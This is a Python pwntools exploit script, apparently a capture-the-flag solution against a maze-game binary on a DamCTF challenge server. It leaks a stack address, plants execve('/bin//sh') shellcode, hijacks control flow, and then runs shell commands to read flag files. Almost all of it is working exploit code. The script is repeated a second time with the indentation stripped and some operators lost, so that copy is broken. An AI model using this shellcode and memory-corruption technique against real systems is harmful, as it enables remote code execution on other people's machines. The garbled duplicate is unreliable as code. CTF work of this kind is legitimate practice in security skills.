Arinerron/exploit2.py

## exploit2.py
#!/usr/bin/env python3

from pwn import *

print('------ TESTING VAL %d -=------' % int(sys.argv[1]))
while True:
    p = remote('chals.damctf.xyz', 31314)
    #p = remote('localhost', 9999)
    #p = process('./sir-marksalot')
    p.recvuntil('What would you like to do?\n')
    p.sendline(b'jump up and down')

    def get_maze():
        p.recvuntil('something, m - show map):');
        p.sendline(b'm')

        maze = list(str(p.recvuntil('This room has exits to the')[:-len('This room has exits to the')]))
        maze[len(maze) - len('+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n') - 7] = 'E'

        retval = ''
        for i in maze:
            retval += i

        return retval.replace('\\n', '\n')[3:]


    def get_pos_idx(): # x, y
        i = 0
        for line in get_maze().strip().split('\n'):
            if '*' in line:
                return (line.index('*')//4 + 1), i//2
            i += 1
        raise ValueError('Could not find *')


    def leak():
        time.sleep(0.8)
        p.clean()
        p.sendline('m')
        time.sleep(0.6)
        #move('m')
        data = p.recvuntil('you like ')

        if b'On the wall is written: ' not in data:
            return
        data = data.split(b' is written: ')[1].split(b'\n\n')[0]
        if len(data) > 8:
            print(data)
            return
        data = u64(data.ljust(8, b'\x00'))
        print(hex(data))
        return data


    def can_move(x):
        p.sendlineafter(b'm - show map): ', x)
        return b' a wall there' in p.recvuntil(b'What would')


    def move(x):
        p.sendlineafter(b'm - show map): ', x)


    def clear(data=b'?'*(0x8*4)):
        p.sendlineafter(b'm - show map): ', 'x')
        p.sendlineafter(b'What would', data)

    start_x, start_y = get_pos_idx()
    end_x, end_y = 0x28, 0x28

    for rel_xi in range(start_x - 1):
        clear()
        move('a')

    for rel_yi in range(end_y - start_y - 1):
        clear()
        move('s')

    payload = b'\x90\x90\x90' + b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
    payload += b'\xcc'
    payload = payload.ljust(0x21, b'?')
    print('payload len %d' % len(payload), '::', payload)

    num_extra = 9

    clear(payload)
    for i in range(num_extra):
        move('d')
        clear()

    p.clean()
    #context.log_level = 'debug'
    p.sendline('s')
    try:
        stack_rsp = leak() - 0xca20
    except TypeError:
        p.close()
        continue
    stack_payload = stack_rsp + 0xc320 + 0x78 + (int(sys.argv[1])*3)
    print('payload addr', hex(stack_payload))

    clear()
    move('w')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    for i in range(num_extra - 5):
        move('a')
        clear()
    move('s')
    clear(b'B'*8 + p64(stack_payload) + b'?'*0x20)
    move('d')
    move('w')
    move('d')
    clear()
    move('w')
    clear()
    move('w')
    try:
        leak()
    except TypeError:
        p.close()
        continue

    while True:
        clear()
        p.sendline(b'a')
        if b'Grue' in p.recvline():
            break


    '''
    for rel_xi in range(end_x - 5 - 1):
        clear()
        move('d')
    '''

    p.sendline('\necho WE WON ; whoami ; cat /flag ; cat /flag.txt ; cat flag ; exit')
    print(p.recvall())
    break
	#!/usr/bin/env python3

	from pwn import *

	print('------ TESTING VAL %d -=------' % int(sys.argv[1]))
	while True:
	p = remote('chals.damctf.xyz', 31314)
	#p = remote('localhost', 9999)
	#p = process('./sir-marksalot')
	p.recvuntil('What would you like to do?\n')
	p.sendline(b'jump up and down')

	def get_maze():
	p.recvuntil('something, m - show map):');
	p.sendline(b'm')

	maze = list(str(p.recvuntil('This room has exits to the')[:-len('This room has exits to the')]))
	maze[len(maze) - len('+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n') - 7] = 'E'

	retval = ''
	for i in maze:
	retval += i

	return retval.replace('\\n', '\n')[3:]


	def get_pos_idx(): # x, y
	i = 0
	for line in get_maze().strip().split('\n'):
	if '*' in line:
	return (line.index('*')//4 + 1), i//2
	i += 1
	raise ValueError('Could not find *')


	def leak():
	time.sleep(0.8)
	p.clean()
	p.sendline('m')
	time.sleep(0.6)
	#move('m')
	data = p.recvuntil('you like ')

	if b'On the wall is written: ' not in data:
	return
	data = data.split(b' is written: ')[1].split(b'\n\n')[0]
	if len(data) > 8:
	print(data)
	return
	data = u64(data.ljust(8, b'\x00'))
	print(hex(data))
	return data


	def can_move(x):
	p.sendlineafter(b'm - show map): ', x)
	return b' a wall there' in p.recvuntil(b'What would')


	def move(x):
	p.sendlineafter(b'm - show map): ', x)


	def clear(data=b'?'(0x84)):
	p.sendlineafter(b'm - show map): ', 'x')
	p.sendlineafter(b'What would', data)

	start_x, start_y = get_pos_idx()
	end_x, end_y = 0x28, 0x28

	for rel_xi in range(start_x - 1):
	clear()
	move('a')

	for rel_yi in range(end_y - start_y - 1):
	clear()
	move('s')

	payload = b'\x90\x90\x90' + b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
	payload += b'\xcc'
	payload = payload.ljust(0x21, b'?')
	print('payload len %d' % len(payload), '::', payload)

	num_extra = 9

	clear(payload)
	for i in range(num_extra):
	move('d')
	clear()

	p.clean()
	#context.log_level = 'debug'
	p.sendline('s')
	try:
	stack_rsp = leak() - 0xca20
	except TypeError:
	p.close()
	continue
	stack_payload = stack_rsp + 0xc320 + 0x78 + (int(sys.argv[1])*3)
	print('payload addr', hex(stack_payload))

	clear()
	move('w')
	clear()
	move('a')
	clear()
	move('a')
	clear()
	move('a')
	clear()
	for i in range(num_extra - 5):
	move('a')
	clear()
	move('s')
	clear(b'B'8 + p64(stack_payload) + b'?'0x20)
	move('d')
	move('w')
	move('d')
	clear()
	move('w')
	clear()
	move('w')
	try:
	leak()
	except TypeError:
	p.close()
	continue

	while True:
	clear()
	p.sendline(b'a')
	if b'Grue' in p.recvline():
	break


	'''
	for rel_xi in range(end_x - 5 - 1):
	clear()
	move('d')
	'''

	p.sendline('\necho WE WON ; whoami ; cat /flag ; cat /flag.txt ; cat flag ; exit')
	print(p.recvall())
	break